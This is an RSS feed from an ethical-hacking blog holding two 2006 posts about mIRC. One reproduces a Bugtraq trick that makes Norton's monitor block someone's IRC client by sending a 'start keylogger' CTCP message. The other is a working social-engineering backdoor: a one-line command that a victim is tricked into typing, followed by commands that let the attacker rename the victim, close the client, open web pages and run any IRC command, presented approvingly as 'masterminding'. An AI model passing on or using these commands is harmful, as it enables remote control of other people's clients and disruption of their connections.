<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Darknet - The Darkside &#187; mIRC</title>
	<atom:link href="http://www.darknet.org.uk/tag/mirc/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.darknet.org.uk</link>
	<description>Ethical Hacking, Penetration Testing &#38; Computer Security</description>
	<lastBuildDate>Tue, 07 Feb 2012 18:34:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Norton Antivirus Funny Bug</title>
		<link>http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/</link>
		<comments>http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/#comments</comments>
		<pubDate>Thu, 02 Mar 2006 11:51:50 +0000</pubDate>
		<dc:creator>backbone</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[antitrust]]></category>
		<category><![CDATA[bypass-firewall]]></category>
		<category><![CDATA[IRC]]></category>
		<category><![CDATA[mIRC]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/</guid>
		<description><![CDATA[the following exploits (if we can call it this way) was published on securityfocus bugtraq mailinglist&#8230; it is entirely reproduced in the following lines: Norton Internet monitoring tools issues Versions Affected : * Fix : No What im writing about is how to stop the internet of some user that is using the norton tools [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>the following exploits (if we can call it this way) was published on <a href="http://securityfocus.com">securityfocus</a> bugtraq mailinglist&#8230; it is entirely reproduced in the following lines:</p>
<blockquote><p>
Norton Internet monitoring tools issues<br />
Versions Affected : *<br />
Fix : No</p>
<p>What im writing about is how to stop the internet of some user that is<br />
using the norton tools and IRC / any other chat at the same time.</p>
<p>By default norton monitor checks for words like &#8220;keylogger&#8221; , &#8220;start<br />
keylogger&#8221; , &#8220;key logger&#8221; and etc.etc.</p>
<p>Example for irc :<br />
Start a mIRC or any other IRC client that u like and connect to some<br />
server.<br />
Type down /ctcp yournick start keylogger . By default norton monitors<br />
your mIRC Process and your logs of it so it sees &#8220;star keylogger&#8221; and<br />
automaticly blocks mIRC.exe from starting and automaticly blocks port<br />
6667 or whatever port ure using to connect to IRC. Nice eh ?</p>
<p>Aleksander Hristov
</p></blockquote>
<p></p>
<p>So you should be in a small manner paranoic when using Norton tools&#8230;  </p>
<div class="tweetthis" style="text-align:left;"><p> <a class="tt" href="http://twitter.com/intent/tweet?text=Norton+Antivirus+Funny+Bug+http%3A%2F%2Fdarknet.org.uk%2F%3Fp%3D77+from+%40THEdarknet" title="Post to Twitter"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/twitter/tt-twitter-micro3.png" alt="Post to Twitter" /></a> <a class="tt" href="http://www.facebook.com/share.php?u=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;t=Norton+Antivirus+Funny+Bug" title="Post to Facebook"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/facebook/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a class="tt" href="http://www.google.com/buzz/post?url=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;imageurl=" title="Post to Google Buzz"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/gbuzz/tt-gbuzz-micro3.png" alt="Post to Google Buzz" /></a> <a class="tt" href="http://delicious.com/post?url=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;title=Norton+Antivirus+Funny+Bug" title="Post to Delicious"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/delicious/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a class="tt" href="http://digg.com/submit?url=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;title=Norton+Antivirus+Funny+Bug" title="Post to Digg"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/digg/tt-digg-micro3.png" alt="Post to Digg" /></a> <a class="tt" href="http://reddit.com/submit?url=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;title=Norton+Antivirus+Funny+Bug" title="Post to Reddit"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/reddit/tt-reddit-micro3.png" alt="Post to Reddit" /></a> <a class="tt" href="http://stumbleupon.com/submit?url=http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/&amp;title=Norton+Antivirus+Funny+Bug" title="Post to StumbleUpon"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/su/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p></div><div class="AWD_like_button "><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.darknet.org.uk%2F2006%2F03%2Fnorton-antivirus-funny-bug%2F&amp;send=false&amp;layout=standard&amp;width=&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:px; height:40px;" allowTransparency="true"></iframe></div>]]></content:encoded>
			<wfw:commentRss>http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>mIRC Backdoor</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/</link>
		<comments>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comments</comments>
		<pubDate>Fri, 24 Feb 2006 22:16:46 +0000</pubDate>
		<dc:creator>backbone</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[backbone]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[mIRC]]></category>
		<category><![CDATA[online-scams]]></category>
		<category><![CDATA[trojans]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/</guid>
		<description><![CDATA[Well it&#8217;s not really a backdoor&#8230; but we can consider it one&#8230; Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC&#8230; all this backdoor stuff was really nothing more than a mIRC script that by it&#8217;s mean made the client to respond at any command received via [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>Well it&#8217;s not really a backdoor&#8230; but we can consider it one&#8230;</p>
<p>Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC&#8230; all this backdoor stuff was really nothing more than a mIRC script that by it&#8217;s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command&#8230; such as ping, version, time, etc&#8230;. so here is the command that the victim has to enter:</p>
<blockquote><p>//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll</p>
</blockquote>
<p>The command is splited in 2 parts, delimited by | (a vertical line)&#8230; So the first section writes a file &#8220;mirc.dll&#8221; in which we write a simple mIRC script which listens to any CTCP request&#8230; the second one loads the file with the mIRC script&#8230;.</p>
<p>After the &#8220;victim&#8221; executes this command we can control it by introducing one of the following lines:</p>
<blockquote><p>{ this is a comment }</p>
<p>/ctcp victims_nick /.nick lamer  { changes the nickname of the victim to lamer }</p>
<p>/ctcp victims_nick /.exit { closes the victims mIRC }</p>
<p>/ctcp victims_nick /.run www.black2white.as.ro<br />
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }</p>
</p>
<p>/ctcp victims_nick /.any_valid_irc_command</p>
</blockquote>
<p>So happy &#8220;masterminding&#8221;&#8230;.</p>
<p></p>
<p>More IRC Commands: <a href="http://www.hackthissite.org/pages/irc/reference.php">http://www.hackthissite.org/pages/irc/reference.php</a></p>
<div class="tweetthis" style="text-align:left;"><p> <a class="tt" href="http://twitter.com/intent/tweet?text=mIRC+Backdoor+http%3A%2F%2Fdarknet.org.uk%2F%3Fp%3D71+from+%40THEdarknet" title="Post to Twitter"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/twitter/tt-twitter-micro3.png" alt="Post to Twitter" /></a> <a class="tt" href="http://www.facebook.com/share.php?u=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;t=mIRC+Backdoor" title="Post to Facebook"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/facebook/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a class="tt" href="http://www.google.com/buzz/post?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;imageurl=" title="Post to Google Buzz"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/gbuzz/tt-gbuzz-micro3.png" alt="Post to Google Buzz" /></a> <a class="tt" href="http://delicious.com/post?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Delicious"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/delicious/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a class="tt" href="http://digg.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Digg"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/digg/tt-digg-micro3.png" alt="Post to Digg" /></a> <a class="tt" href="http://reddit.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Reddit"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/reddit/tt-reddit-micro3.png" alt="Post to Reddit" /></a> <a class="tt" href="http://stumbleupon.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to StumbleUpon"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/su/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p></div><div class="AWD_like_button "><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.darknet.org.uk%2F2006%2F02%2Fmirc-backdoor%2F&amp;send=false&amp;layout=standard&amp;width=&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:px; height:40px;" allowTransparency="true"></iframe></div>]]></content:encoded>
			<wfw:commentRss>http://www.darknet.org.uk/2006/02/mirc-backdoor/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
	</channel>
</rss>

